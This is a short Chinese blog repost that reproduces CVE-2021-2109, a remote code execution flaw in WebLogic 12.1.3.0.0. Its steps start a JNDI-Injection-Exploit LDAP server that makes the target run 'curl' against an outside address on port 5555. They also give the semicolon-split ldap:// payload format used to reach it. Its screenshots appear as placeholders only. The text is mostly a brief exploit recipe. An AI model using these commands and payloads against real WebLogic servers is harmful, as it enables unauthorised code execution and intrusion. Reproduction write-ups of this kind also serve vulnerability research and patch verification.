文章首页 Web开发 Windows开发 编程语言 数据库技术 移动平台 系统服务 微信 设计 布布扣 其他

CVE-2021-2109 Weblogic远程代码执行漏洞复现

时间:2021-01-23 10:11:53   收藏:0   阅读:231

环境:

Weblogic 12.1.3.0.0

1.开启LDAP服务

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C "curl [Address]:5555"

技术分享图片

2.使用Payload

PS:ldap://x.x.x;(分号)x:1389/xxx

技术分享图片

 3.效果

技术分享图片

参考链接:

https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw

原文:https://www.cnblogs.com/liangzai6/p/14316102.html

评论(0
© 2014 bubuko.com 版权所有 - 联系我们:wmxa8@hotmail.com
打开技术之扣,分享程序人生!